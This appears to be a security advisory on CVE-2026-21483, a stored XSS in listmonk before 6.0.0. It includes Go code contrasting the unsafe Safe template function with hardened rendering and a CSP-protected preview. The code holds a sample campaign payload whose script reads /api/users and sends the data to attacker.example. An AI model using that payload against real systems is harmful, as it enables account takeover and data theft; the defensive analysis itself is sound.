CVE-2026-21483

Trust Issues: Escalating from Newsletter Editor to God Mode in Listmonk

Alon Barad
Software Engineer

Jan 2, 2026 · 6 min read

Executive Summary (TL;DR)

Listmonk versions before 6.0.0 trusted campaign content too much. The Safe template function marks its argument as trusted HTML, so the template engine emits it without escaping. A user who can edit campaigns (the campaigns:manage permission) can therefore pipe a string containing a script tag through Safe and store JavaScript in a campaign body. When an administrator previews that campaign, the script runs in the administrator's browser session, which is enough to act as the administrator and take over the account.

A critical Stored XSS vulnerability in the popular self-hosted newsletter manager, listmonk, allows low-privileged users to hijack administrative accounts via unsafe template rendering.
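The following Go program is an added illustration written for this page; it is not code from the advisory or from the listmonk project, and it does not reproduce the 6.0.0 fix. It reconstructs the pattern the summary describes: a template function named Safe that turns any string into template.HTML, which Go's html/template then emits verbatim, bypassing the contextual escaping that would otherwise neutralize a script tag. The attacker body is a constructed sample, and hardenedFuncs (Safe only bypasses escaping for a principal allowed to author raw HTML) and previewHandler (a Content-Security-Policy with sandbox and script-src 'none' on the preview response) are hypothetical mitigations for the example, the second being defense in depth rather than a substitute for not handing low-privileged users a way to mint trusted HTML.

```go
package main

import (
	"bytes"
	"fmt"
	"html/template"
	"net/http"
	"net/http/httptest"
	"strings"
)

// Constructed sample: a campaign body as a low-privileged editor could save it.
// The string literal is piped through Safe so the engine's escaping is bypassed.
const attackerBody = `<p>Hi {{ .Name }}</p>{{ "<script>fetch('/api/users').then(r=>r.text()).then(t=>fetch('https://attacker.example/?d='+btoa(t)))</script>" | Safe }}`

// Illustrative reconstruction of the vulnerable pattern (not listmonk's code):
// Safe converts any string into template.HTML, which html/template emits as-is.
func vulnerableFuncs() template.FuncMap {
	return template.FuncMap{
		"Safe": func(s string) template.HTML { return template.HTML(s) },
	}
}

// Hypothetical hardening: Safe only bypasses escaping when the principal who
// authored the template may emit raw HTML; otherwise it escapes like {{ . }}.
func hardenedFuncs(callerMayEmitRawHTML bool) template.FuncMap {
	return template.FuncMap{
		"Safe": func(s string) template.HTML {
			if callerMayEmitRawHTML {
				return template.HTML(s)
			}
			return template.HTML(template.HTMLEscapeString(s))
		},
	}
}

// renderCampaign parses and executes a campaign body with the given FuncMap,
// using html/template so contextual escaping applies to everything but template.HTML.
func renderCampaign(body string, funcs template.FuncMap) (string, error) {
	tpl, err := template.New("campaign").Funcs(funcs).Parse(body)
	if err != nil {
		return "", err
	}
	var out bytes.Buffer
	if err := tpl.Execute(&out, map[string]string{"Name": "Alice"}); err != nil {
		return "", err
	}
	return out.String(), nil
}

// containsLiveScript reports whether the rendered HTML carries an unescaped <script tag.
func containsLiveScript(rendered string) bool {
	return strings.Contains(strings.ToLower(rendered), "<script")
}

// previewHandler is a hypothetical admin preview endpoint. Even when the body
// still contains a script, script-src 'none' blocks inline script execution and
// sandbox gives the document an opaque origin, so it is not running as the admin UI.
func previewHandler(rendered string) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		w.Header().Set("Content-Security-Policy",
			"sandbox; default-src 'none'; script-src 'none'; img-src https:; style-src 'unsafe-inline'")
		w.Header().Set("Content-Type", "text/html; charset=utf-8")
		w.Header().Set("X-Content-Type-Options", "nosniff")
		_, _ = w.Write([]byte(rendered))
	})
}

// previewResponse serves a rendered body through previewHandler and returns the response.
func previewResponse(rendered string) *http.Response {
	rec := httptest.NewRecorder()
	req := httptest.NewRequest(http.MethodGet, "/api/campaigns/1/preview", nil)
	previewHandler(rendered).ServeHTTP(rec, req)
	return rec.Result()
}

func main() {
	vuln, _ := renderCampaign(attackerBody, vulnerableFuncs())
	hard, _ := renderCampaign(attackerBody, hardenedFuncs(false))
	fmt.Println("vulnerable render has live script:", containsLiveScript(vuln))
	fmt.Println("hardened render has live script:  ", containsLiveScript(hard))
	fmt.Println("preview CSP:", previewResponse(vuln).Header.Get("Content-Security-Policy"))
}
```

With vulnerableFuncs the output contains the script tag byte for byte; with hardenedFuncs(false) the same body renders as `&lt;script&gt;...` and is inert. The CSP on the preview response is worth adding regardless of the template fix, because it limits what any future escaping bug can reach from the administrator's session.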

Fix Analysis

Technical Appendix

CVSS Score
8.0 / 10
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H

Affected Systems

listmonk < 6.0.0

Affected Versions Detail

Product     Affected Versions    Fixed Version
listmonk    < 6.0.0              6.0.0
Attribute              Detail
CWE ID                 CWE-79
Attack Vector          Network (Stored XSS)
CVSS v3.1              8.0 (High)
Privileges Required    Low (campaigns:manage)
User Interaction       Required (admin views preview)
Impact                 Account takeover / privilege escalation
CWE-79
Stored Cross-Site Scripting

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Vulnerability Timeline

Patch Committed
2025-12-31
Public Disclosure & Release
2026-01-02